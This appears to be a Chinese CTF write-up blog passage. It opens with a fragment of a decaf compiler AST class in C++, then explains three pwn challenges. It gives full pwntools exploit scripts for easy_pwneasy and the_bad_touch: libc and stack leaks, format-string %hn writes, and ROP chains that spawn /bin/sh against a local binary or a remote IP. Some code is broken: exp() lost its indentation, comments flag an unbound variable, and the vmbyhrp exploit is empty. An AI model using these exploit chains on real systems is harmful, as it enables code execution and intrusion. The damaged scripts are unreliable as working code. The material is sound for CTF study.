/// decafBlock - a block, rendered as Kind(declarations,statements).
/// The destructor deletes both lists.
class decafBlock : public decafAST {
    string Kind;
    decafStmtList *FieldDeclList;
    decafStmtList *StateDeclList;
public:
    decafBlock(string kind,decafStmtList *fieldlist, decafStmtList *methodlist)
        : Kind(kind), FieldDeclList(fieldlist), StateDeclList(methodlist) {}

    ~decafBlock() {
        // Deleting a null pointer is a no-op, so no explicit NULL test is needed.
        delete FieldDeclList;
        delete StateDeclList;
    }

    string str() {
        const string decls = getString(FieldDeclList);
        const string stmts = getString(StateDeclList);
        return Kind + "(" + decls + "," + stmts + ")";
    }
};

/// decafIF - if statement, rendered as IfStmt(cond,then,else).
class decafIF : public decafAST {
    decafAllexp * Exp;     // condition
    decafBlock * Block;    // first block
    decafBlock * Block2;   // second block; printed as "None" when NULL
public:
    decafIF(decafAllexp * Exp,decafBlock * Block,decafBlock * Block2)
        : Exp(Exp), Block(Block), Block2(Block2) {}

    string str() {
        const string cond = getString(Exp);
        const string first = getString(Block);
        const string second = getString(Block2);
        return string("IfStmt") + "(" + cond + "," + first + "," + second + ")";
    }
};

/// decafWhile - while loop, rendered as WhileStmt(cond,body).
class decafWhile : public decafAST {
    decafAllexp * Exp;    // loop condition
    decafBlock * Block;   // loop body
public:
    decafWhile(decafAllexp * Exp,decafBlock * Block)
        : Exp(Exp), Block(Block) {}

    string str() {
        const string cond = getString(Exp);
        const string body = getString(Block);
        return string("WhileStmt") + "(" + cond + "," + body + ")";
    }
};

/// decafFor - for loop, rendered as ForStmt(List,Exp,List2,Block).
class decafFor : public decafAST {
    decafAllexp * Exp;
    decafBlock * Block;
    decafAssignList *List;    // printed first
    decafAssignList *List2;   // printed third
public:
    decafFor(decafAllexp * Exp,decafBlock * Block,decafAssignList *List,decafAssignList *List2)
        : Exp(Exp), Block(Block), List(List), List2(List2) {}

    string str() {
        string out("ForStmt");
        out += "(";
        out += getString(List);
        out += ",";
        out += getString(Exp);
        out += ",";
        out += getString(List2);
        out += ",";
        out += getString(Block);
        out += ")";
        return out;
    }
};

/// decafReturn - return statement, rendered as ReturnStmt(value).
/// A NULL value prints as "None".
class decafReturn : public decafAST {
    decafAllexp * Exp;
public:
    decafReturn(decafAllexp * Exp) : Exp(Exp) {}

    string str() {
        const string value = getString(Exp);
        return string("ReturnStmt") + "(" + value + ")";
    }
};

/// ProgramAST - the decaf program
class ProgramAST : public decafAST {
decafStmtList *ExternList;
PackageAST *PackageDef;
public:
ProgramAST(decafStmtList *externs, PackageAST *c) : ExternList(externs), PackageDef(c) {}
~ProgramAST() {
if (ExternList != NULL) { delete ExternList; }
if (PackageDef != NULL) { delete PackageDef; }
}
string str() { return string("Program") + "(" + getString(ExternList) + "," + getString(PackageDef) + ")"; }
};

最终拿到了满分:

1
2
3
4
➜  decafast git:(master) ✗ python3 check.py 
Correct(dev): 134 / 134
Score(dev): 134.00
Total Score: 134.00

easy_pwneasy

1
2
3
4
5
6
pwneasy: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c3f0880bf68ea5bca97853dd259cf44c5f1f9e5a, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,NX,PIE

漏洞思路

1
2
3
4
5
6
7
8
9
10
11
for ( i = 0; i <= 2; ++i )
{
printf("give me address: ");
read(0, buf_addr, 0x20uLL);
addr = (_QWORD *)atoll(buf_addr);
printf("give me value: ");
read(0, buf_value, 0x20uLL);
value = atoll(buf_value);
set(addr, value);
printf("OK %s = %s\n", buf_addr, buf_value);
}
  • 程序非常简洁,就只有3次任意地址写的机会

程序提供的功能太少,我的第一反应是看看栈上有没有遗留的地址可以利用:

1
pwn(1,1)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0x7ffc64422df0-0x60 /* buf_value */
00:0000│ rsp rcx-1 0x7ffc64422d90 ◂— 0x31 /* '1' */
01:00080x7ffc64422d98 ◂— 0x0
02:00100x7ffc64422da0 —▸ 0x7fe493363600 (_IO_file_jumps) ◂— 0x0
03:00180x7ffc64422da8 —▸ 0x7fe4931d762d (_IO_file_setbuf+13) ◂— test rax, rax
04:00200x7ffc64422db0 —▸ 0x7fe493367631 ◂— 0xd700007fe4933271
05:00280x7ffc64422db8 —▸ 0x7fe4931ce765 (setvbuf+245) ◂— cmp rax, 1
06:00300x7ffc64422dc0 ◂— 0x0
07:00380x7ffc64422dc8 —▸ 0x7ffc64422df0 —▸ 0x7ffc64422e00 ◂— 0x1
pwndbg> telescope 0x7ffc64422df0-0x40 /* buf_addr */
00:00000x7ffc64422db0 —▸ 0x7fe493367631 ◂— 0xd700007fe4933271
01:00080x7ffc64422db8 —▸ 0x7fe4931ce765 (setvbuf+245) ◂— cmp rax, 1
02:00100x7ffc64422dc0 ◂— 0x0
03:00180x7ffc64422dc8 —▸ 0x7ffc64422df0 —▸ 0x7ffc64422e00 ◂— 0x1
04:00200x7ffc64422dd0 —▸ 0x7ffc64422f18 —▸ 0x7ffc644240ee ◂— './pwneasy1'
05:00280x7ffc64422dd8 ◂— 0x1
06:00300x7ffc64422de0 ◂— 0x1
07:00380x7ffc64422de8 ◂— 0x904db1c7
  • 在 buf_addr 处有 libc 中遗留的地址,合理的覆盖低位就可以泄露 libc
  • 有 libc 任意写的机会

入侵思路

程序只提供了3次任意写的机会,但是我们可以通过覆盖 i 来将这个机会提升至无限次

覆盖栈上残留 libc 地址的最低字节,再借助 printf 的 %s 回显,就可以泄露 libc_base:

1
2
3
4
5
6
pwn(p8(0x80),0)
p.recvuntil("OK ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x21a680
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

用同样的方法泄露遗留在栈上的栈地址,基于栈地址就可以覆盖 i 了:

1
2
3
4
5
6
7
8
pwn("0"*0x18,0)
p.recvuntil("OK 000000000000000000000000")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))
valuei_addr = stack_addr - 8
success("stack_addr >> "+hex(stack_addr))
success("valuei_addr >> "+hex(valuei_addr))

pwn(str(valuei_addr)+"\n",0xffffffff00000000)

最后打栈溢出就可以了,不过直接调用 system 会触发段错误,于是我们选择执行 syscall

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# -*- coding:utf-8 -*-
from inspect import stack
from multiprocessing.dummy import Value
from random import randrange
from pwn import *

# Target selection and pwntools context. The bodies of the two `if`
# statements are indented again so the script parses.
arch = 64
challenge = './pwneasy1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases over the pwntools tube `p`. Each lambda looks `p` up when it
# is called, so `p` may be assigned after these definitions.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: `s` is a variable *name* that gets eval()'d; only pass trusted literals.
# The colour codes need the ESC prefix (\033) to be real ANSI escapes.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be the single NUL byte b'\x00'; a multi-byte fill makes ljust() raise.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# Open the tube: a local process when `local` is truthy, else the remote
# service. Branch bodies are indented again so the script parses.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to the target with two breakpoints set, then call pause()."""
    #gdb.attach(p)
    breakpoints = "b *$rebase(0x1283)\nb *$rebase(0x12B8)\n"
    gdb.attach(p, breakpoints)
    pause()

def cmd(op):
    """Send ``op`` (converted with str()) as a line after ">" is received."""
    choice = str(op)
    sla(">", choice)

def pwn(addr,data):
    """Answer one "give me address" / "give me value" prompt pair.

    Both arguments are converted with str() before being sent.
    """
    address_text = str(addr)
    value_text = str(data)
    sa("give me address: ", address_text)
    sa("give me value: ", value_text)

# Round 1: send a single byte as the "address" so the "OK %s" echo prints the
# bytes that follow it in the buffer; the first 6 bytes are read as a libc pointer.
pwn(p8(0x80),0)
p.recvuntil("OK ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x21a680
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

# Round 2: fill 0x18 bytes so the echo continues into the next 8-byte slot,
# which is read as a stack pointer.
pwn("0"*0x18,0)
p.recvuntil("OK 000000000000000000000000")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))
# Per the write-up, the loop counter `i` is overwritten through this address.
valuei_addr = stack_addr - 8
success("stack_addr >> "+hex(stack_addr))
success("valuei_addr >> "+hex(valuei_addr))

# Overwrite the counter area so the 3-iteration loop keeps running.
pwn(str(valuei_addr)+"\n",0xffffffff00000000)
# Gadget and string addresses; the offsets are specific to the libc.so.6 in use.
pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_r12_ret = libc_base + 0x000000000011f497
syscall = libc_base + 0x0000000000029db4
system = libc_base + libc.sym["system"]
binsh_addr = libc_base + 0x1d8698
success("system >> "+hex(system))

# From here on each group starts with a counter reset and then stores chain
# entries at consecutive 8-byte slots starting at stack_addr+8.
pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pwn(str(stack_addr+8)+"\n",str(pop_rdi_ret)+"\n")
pwn(str(stack_addr+8*2)+"\n",str(binsh_addr)+"\n")

pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pwn(str(stack_addr+8*3)+"\n",str(pop_rdx_r12_ret)+"\n")
pwn(str(stack_addr+8*4)+"\n",str(0)+"\n")
pwn(str(stack_addr+8*5)+"\n",str(0)+"\n")

pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pwn(str(stack_addr+8*6)+"\n",str(pop_rsi_ret)+"\n")
pwn(str(stack_addr+8*7)+"\n",str(0)+"\n")
pwn(str(stack_addr+8*8)+"\n",str(syscall)+"\n")

#debug()
# Final write stores a different counter value; presumably this ends the loop
# so the function returns into the chain -- TODO confirm against the binary.
pwn(str(valuei_addr)+"\n",0x300000000)

p.interactive()

the_bad_touch

1
2
3
4
5
6
bad: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=37fe215b6944a1cb29f0a404c1071f7cf67baaaf, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,PIE,NX

漏洞分析

两次格式化字符串漏洞:

1
2
3
4
5
/* Calls doit() twice, i.e. two prompt/printf rounds per call of program(). */
void program()
{
doit();
doit();
}
1
2
3
4
5
6
7
8
9
10
/* Reads up to 0x3E8 bytes from stdin into a freshly allocated heap buffer and
   passes that buffer to printf as the format string, then frees the buffer. */
void doit()
{
void *chunk; // [rsp+8h] [rbp-8h]

chunk = malloc(0x3E8uLL);
printf("try it: ");
read(0, chunk, 0x3E8uLL);
// The bytes just read are used as the format string itself.
printf((const char *)chunk);
free(chunk);
}

入侵思路

有格式化字符串漏洞,但缓冲区在堆中;通过当前寄存器和栈上的数据可以泄露 libc_base、heap_base、pro_base 和 stack_addr:

1
2
3
4
5
6
*RCX  0x7faea9be9992 (read+18) ◂— cmp    rax, -0x1000 /* 'H=' */
*RDX 0x3e8
*RDI 0x555eeb6c32a0 ◂— '%3$p\n%1$p\n\n'
*RSI 0x555eeb6c32a0 ◂— '%3$p\n%1$p\n\n'
*R8 0x8
*R9 0x555eeb6c32a0 ◂— '%3$p\n%1$p\n\n'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
payload = "%3$p\n%1$p\n%9$p\n"
sla("try it: ",payload)

leak_addr = eval(p.recvuntil("\n")[:-1])
libc_base = leak_addr - 0x114992
leak_addr = eval(p.recvuntil("\n")[:-1])
heap_base = leak_addr - 0x2a0
leak_addr = eval(p.recvuntil("\n")[:-1])
pro_base = leak_addr - 0x1248
success("libc_base >> "+hex(libc_base))
success("heap_base >> "+hex(heap_base))
success("pro_base >> "+hex(pro_base))

io_list_all = libc_base + libc.sym["_IO_list_all"]
one_gadget = libc_base + 0xebcf1
success("io_list_all >> "+hex(io_list_all))
success("one_gadget >> "+hex(one_gadget))

接着就需要用到非栈上 fmt 的技巧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
pwndbg> telescope 0x7fff32e28280
00:0000│ rsp 0x7fff32e28280 —▸ 0x7fff32e283c8 —▸ 0x7fff32e290d6 ◂— 0x4c00316461622f2e /* './bad1' */
01:00080x7fff32e28288 —▸ 0x55b00dcf82a0 ◂— '%10c$13hn\n'
02:0010│ rbp 0x7fff32e28290 —▸ 0x7fff32e282a0 —▸ 0x7fff32e282b0 ◂— 0x1
03:00180x7fff32e28298 —▸ 0x55b00ce2e252 ◂— nop
04:00200x7fff32e282a0 —▸ 0x7fff32e282b0 ◂— 0x1
05:00280x7fff32e282a8 —▸ 0x55b00ce2e26d ◂— mov eax, 0
06:00300x7fff32e282b0 ◂— 0x1
07:00380x7fff32e282b8 —▸ 0x7fb072b0bd90 (__libc_start_call_main+128) ◂— mov edi, eax
08:00400x7fff32e282c0 ◂— 0x0
09:00480x7fff32e282c8 —▸ 0x55b00ce2e255 ◂— push rbp
0a:00500x7fff32e282d0 ◂— 0x100000000
0b:00580x7fff32e282d8 —▸ 0x7fff32e283c8 —▸ 0x7fff32e290d6 ◂— 0x4c00316461622f2e /* './bad1' */
0c:00600x7fff32e282e0 ◂— 0x0
0d:00680x7fff32e282e8 ◂— 0x1149dda85894f8f3
0e:00700x7fff32e282f0 —▸ 0x7fff32e283c8 —▸ 0x7fff32e290d6 ◂— 0x4c00316461622f2e /* './bad1' */
0f:00780x7fff32e282f8 —▸ 0x55b00ce2e255 ◂— push rbp
10:00800x7fff32e28300 —▸ 0x55b00ce30dd8 —▸ 0x55b00ce2e130 ◂— endbr64
11:00880x7fff32e28308 —▸ 0x7fb072d46040 (_rtld_global) —▸ 0x7fb072d472e0 —▸ 0x55b00ce2d000 ◂— 0x10102464c457f
12:00900x7fff32e28310 ◂— 0xeeb7b86d5d16f8f3
13:00980x7fff32e28318 ◂— 0xee2938c9221ef8f3

对于非栈上 fmt 有两个关键点:

  • 修改栈指针,使两个栈指针最终指向同一片空间(需要修改的目标)
  • 覆盖返回地址写循环

位于 0x7fff32e28290 和 0x7fff32e282a0 这两处地址的空间正好符合条件,但在实际利用的过程中遇到了以下问题:

  • %n 修改过的栈空间并不能第一时间生效(第二个 %n 不会识别修改后的数据,而是会识别修改前的)
  • printf 不会调用 buffered_vfprintf 而是直接 jmp 过去(这意味着不能通过覆盖 __vfprintf_internal 的返回地址来实现循环)

最后想出的解决办法是:第一次 fmt 用 %hn 改写栈指针的低 2 字节,以 1/4096 的概率使其指向函数 doit 的返回地址所在的栈位置

1
2
3
4
magic = 0xdbe8-0x38
payload = "%3$p\n%1$p\n%9$p\n%6$p\n"
payload += "%{}c%8$hn\n".format(magic)
sla("try it: ",payload)

在后续操作中交替覆盖函数 doit 的返回地址和函数 main 的返回地址,构造出 ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def pwn(target):
    """Send the format-string rounds that store ``target`` 16 bits at a time.

    ``target`` is split into three 16-bit pieces, low to high. Each piece
    takes two "try it: " rounds, and each round performs two ``%hn`` writes
    ordered so the smaller value is printed first:

    1. argument 8 receives ``magic_stack1`` and argument 10 receives the piece;
    2. argument 10 receives ``magic_main`` and argument 8 receives
       ``magic_stack2`` (plus 2 bytes per piece already written).

    After the third piece ``magic_stack2`` advances by 8. The ``-1`` in the
    pad widths accounts for the newline printed between the two writes.

    Uses the globals ``magic_stack1``, ``magic_stack2``, ``magic_main`` and
    the ``sla`` helper.
    """
    global magic_stack2
    if(target < 0x10000):
        # NOTE(review): magic_gadget is read here before the loop below assigns
        # it, so this branch raises UnboundLocalError if it is ever taken.
        payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
        sla("try it: ",payload)
        magic_stack2 = magic_stack2 + 8

    for i in range(3):
        magic_gadget = (target >> 16*i)%0x10000

        success("magic_gadget >> "+hex(magic_gadget))
        if(magic_stack1 > magic_gadget):
            payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_gadget,magic_stack1-1-magic_gadget).ljust(0x60,"\x00")
            sla("try it: ",payload)
        else:
            payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
            sla("try it: ",payload)

        y = i+1
        if(i == 2):
            magic_stack2 = magic_stack2 + 8
            y = 0

        if(magic_stack2 > magic_main):
            payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_main,magic_stack2-1+2*y-magic_main).ljust(0x60,"\x00")
            sla("try it: ",payload)
        else:
            # Fixed: the template must start with '%' (it used to end with a
            # stray '%'), otherwise the first pad width is printed literally.
            # NOTE(review): here 2*y ends up added to the argument-10 value,
            # while the branch above adds it to the argument-8 value -- confirm
            # which one is intended.
            payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack2,magic_main-1+2*y-magic_stack2).ljust(0x60,"\x00")
            sla("try it: ",payload)

还有最后一个问题:由于破坏了栈结构,导致 system("/bin/sh") 失效,如果构造 execve("/bin/sh",0,0) 则会受到格式化字符串 %n 的限制(写入的数据不能为“0”)

此时我们可以先构造 sys_read(0,stack,size),然后在栈上输入 ROP(利用 gadget 控制对应寄存器为“0”即可)

在 DEBUG 模式的配合下,勉强写出了可以在 DEBUG 模式中打通的 exp,但正常执行的程序怎么都爆破不出来,后来发现是 DEBUG 模式和正常模式的栈空间不太一样,修正 exp 后理论上可以爆破出 flag(关闭随机化后就可以打出 flag,但 1/4096 的概率太低了)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
# -*- coding:utf-8 -*-
from time import sleep
from pwn import *

# Target selection and pwntools context. The bodies of the two `if`
# statements are indented again so the script parses.
arch = 64
challenge = './bad1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases over the pwntools tube `p`. Each lambda looks `p` up when it
# is called, so `p` may be assigned after these definitions.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: `s` is a variable *name* that gets eval()'d; only pass trusted literals.
# The colour codes need the ESC prefix (\033) to be real ANSI escapes.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be the single NUL byte b'\x00'; a multi-byte fill makes ljust() raise.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

cmd = "set debug-file-directory ./.debug/\nb *$rebase(0x1254)\n"

def debug():
    """Attach gdb to the target with one breakpoint set, then call pause()."""
    #gdb.attach(p)
    breakpoints = " b *$rebase(0x1226)\n"
    gdb.attach(p, breakpoints)
    pause()

def cmd(op):
    """Send ``op`` (converted with str()) as a line after ">" is received."""
    choice = str(op)
    sla(">", choice)

def exp():
#debug()
def pwn(target):
    """Send the format-string rounds that store ``target`` 16 bits at a time.

    ``target`` is split into three 16-bit pieces, low to high. Each piece
    takes two "try it: " rounds, and each round performs two ``%hn`` writes
    ordered so the smaller value is printed first:

    1. argument 8 receives ``magic_stack1`` and argument 10 receives the piece;
    2. argument 10 receives ``magic_main`` and argument 8 receives
       ``magic_stack2`` (plus 2 bytes per piece already written).

    After the third piece ``magic_stack2`` advances by 8. The ``-1`` in the
    pad widths accounts for the newline printed between the two writes.

    Uses ``magic_stack1``, ``magic_stack2``, ``magic_main`` and the ``sla``
    helper from the surrounding script.
    """
    # NOTE(review): `global` only reaches module-level names; confirm that
    # magic_stack2 is assigned at module level rather than inside exp().
    global magic_stack2
    if(target < 0x10000):
        # NOTE(review): magic_gadget is read here before the loop below assigns
        # it, so this branch raises UnboundLocalError if it is ever taken.
        payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
        sla("try it: ",payload)
        magic_stack2 = magic_stack2 + 8

    for i in range(3):
        magic_gadget = (target >> 16*i)%0x10000
        success("magic_gadget >> "+hex(magic_gadget))
        if(magic_stack1 > magic_gadget):
            payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_gadget,magic_stack1-1-magic_gadget).ljust(0x60,"\x00")
            sla("try it: ",payload)
        else:
            payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
            sla("try it: ",payload)

        y = i+1
        if(i == 2):
            magic_stack2 = magic_stack2 + 8
            y = 0

        if(magic_stack2 > magic_main):
            payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_main,magic_stack2-1+2*y-magic_main).ljust(0x60,"\x00")
            sla("try it: ",payload)
        else:
            # Fixed: the template must start with '%' (it used to end with a
            # stray '%'), otherwise the first pad width is printed literally.
            # NOTE(review): here 2*y ends up added to the argument-10 value,
            # while the branch above adds it to the argument-8 value -- confirm
            # which one is intended.
            payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack2,magic_main-1+2*y-magic_stack2).ljust(0x60,"\x00")
            sla("try it: ",payload)

magic = 0xdc08-0x38
payload = "%3$p\n%1$p\n%9$p\n%6$p\n"
payload += "%{}c%8$hn\n".format(magic)
sla("try it: ",payload)

leak_addr = eval(p.recvuntil("\n")[:-1])
libc_base = leak_addr - 0x114992
leak_addr = eval(p.recvuntil("\n")[:-1])
heap_base = leak_addr - 0x2a0
leak_addr = eval(p.recvuntil("\n")[:-1])
pro_base = leak_addr - 0x1248
leak_addr = eval(p.recvuntil("\n")[:-1])
stack_addr = leak_addr - 0x148
success("libc_base >> "+hex(libc_base))
success("heap_base >> "+hex(heap_base))
success("pro_base >> "+hex(pro_base))
success("stack_addr >> "+hex(stack_addr))

io_list_all = libc_base + libc.sym["_IO_list_all"]
one_gadget = libc_base + 0x50a37
system = libc_base + libc.sym["system"]
binsh_addr = libc_base + 0x1d8698
pop_rax_ret = libc_base + 0x0000000000045eb0
pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rcx_ret = libc_base + 0x000000000008c6bb
pop_rbx_ret = libc_base + 0x0000000000035dd1
pop_rdx_r12_ret = libc_base + 0x000000000011f497
syscall_ret = libc_base + 0x0000000000091396
mov_rdi_rbx_call_rcx = libc_base + 0x000000000015e9d8
add_rax_1_ret = libc_base + 0x00000000000d83b0
mov_rax_n1_ret = libc_base + 0x000000000004244e
mov_rdx_256_ret =libc_base + 0x00000000000ecfe7

success("io_list_all >> "+hex(io_list_all))
success("system >> "+hex(system))
success("binsh_addr >> "+hex(binsh_addr))
success("pop_rdi_ret >> "+hex(pop_rdi_ret))
success("one_gadget >> "+hex(one_gadget))

magic_stack1 = (stack_addr + 0x18)%0x10000
magic_stack2 = (stack_addr + 0x38)%0x10000
magic_main = (pro_base + 0x123B)%0x10000
magic_one1 = (one_gadget)%0x10000
magic_one2 = (one_gadget >> 16)%0x10000

payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_main,magic_stack2-1-magic_main).ljust(0x60,"\x00")
sla("try it: ",payload)

pwn(pop_rsi_ret)
pwn(stack_addr+0x80)
pwn(mov_rdx_256_ret)
pwn(mov_rax_n1_ret)
pwn(add_rax_1_ret)
pwn(pop_rcx_ret)
pwn(binsh_addr)
pwn(pop_rcx_ret)
pwn(syscall_ret)
pwn(mov_rdi_rbx_call_rcx)

sla("try it: ","1"*0x20)
sla("try it: ","2"*0x20)

payload = p64(pop_rax_ret)+p64(59)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(pop_rsi_ret)+p64(0)+p64(pop_rdx_r12_ret)+p64(0)+p64(0)+p64(syscall_ret)
sla("22222222222222222222222222222222",payload)

p.interactive()

# Retry driver: start a fresh target, run exp(), and stop once a line has been
# read back after sending "cat flag". Any failure closes the tube and retries.
while(1):
    try:
        local = 1
        if local:
            p = process(challenge)
            #p = gdb.debug(challenge, cmd)
        else:
            p = remote('119.13.105.35','10111')
        exp()
        # Fixed: sla() takes a delimiter and a payload; with one argument it
        # raised TypeError, which the old bare `except:` silently swallowed, so
        # the loop could never finish. sl() just sends the line.
        sl("cat flag")
        flag = p.recvline()
        success("flag >> "+flag)
        break
    except Exception:
        # `Exception` (not a bare except) so Ctrl-C can still stop the loop.
        p.close()

vmbyhrp

1
2
3
4
5
6
HRPVM: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ae19ec35e351cd7e0113b04270566c04bd3bd321, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

在 DEBUG 命令中有读取任意文件的功能:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
puts("FILE NAME:");
name = malloc(0x20uLL);
read(0, name, 0x20uLL);
deleEnter((const char *)name);
stream = fopen((const char *)name, "ab+");
if ( stream )
{
for ( i = 0; (unsigned int)__isoc99_fscanf(stream, "%c", &data[i]) != -1; ++i )
;
fclose(stream);
HF[file_count].fd = global_fd;
HF[file_count].name = (char *)name;
HF[file_count].size = 1000LL;
count = file_count;
HF[count].data = (__int64)malloc(0x1000uLL);
strncpy((char *)HF[file_count].data, data, 0x1000uLL);
++file_count;
++global_fd;
}
  • DEBUG 命令需要覆盖 gid 和 uid
1
2
if ( !strncmp(system_cmd[6], (const char *)buf, len) && !gid && !uid )// debug
DEBUG();

全局变量 file_count 没有限制大小,导致 HF 可以向下溢出到 gid 和 uid

1
2
3
4
5
6
7
8
9
HF[file_count].fd = global_fd;
HF[file_count].name = name;
HF[file_count].size = 1000LL;
count = file_count;
HF[count].data = (__int64)malloc(0x1000uLL);
printf("FILE CONTENT: ");
read(0, (void *)HF[file_count].data, 0x1000uLL);
deleEnter((const char *)HF[file_count].data);
++file_count;

入侵思路

使用如下两个脚本并配合溢出可以很轻松地覆盖 gid 和 uid:

1
2
3
4
5
6
7
8
9
10
payload =  "mov rdi,1;"
payload += "mov rsi,36;"
payload += "mov rdx,1001;"
payload += "mov rax,1;"
payload += "call write,1;"

payload2 = "mov rdi,35;"
payload2 += "mov rsi,0;"
payload2 += "mov rax,2;"
payload2 += "call open,2;"

但 DEBUG 退出时会置空全局变量 dest 导致后续程序触发段错误:

1
2
3
4
5
deleEnter(buf);
gid = 1000;
uid = 1000;
strncpy(dest, src, 8uLL);
machine_start();

login_system 函数中可以往全局变量 dest 中写入数据:

1
2
printf("%s", "[+]HOLDER:");
read(0, dest, 0x10uLL);

在 mmap 命令中可以使用 mmap 创建一片合法的空间:

1
2
3
4
5
6
7
if ( !strncmp(debug_cmd[4], buf, len) )     // mmap
{
addr = 0LL;
puts("[+]ADDR EXPEND:");
__isoc99_scanf("%lld", &addr);
mmap(addr, 0x400uLL, 3, 34, -1, 0LL);
}

于是我们可以在 DEBUG 使用 mmap 指令创建合法空间,然后 reboot 调用 login_system 并写入合法空间,这样就不会发生段错误了

剩下的操作就是程序的正常功能,完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
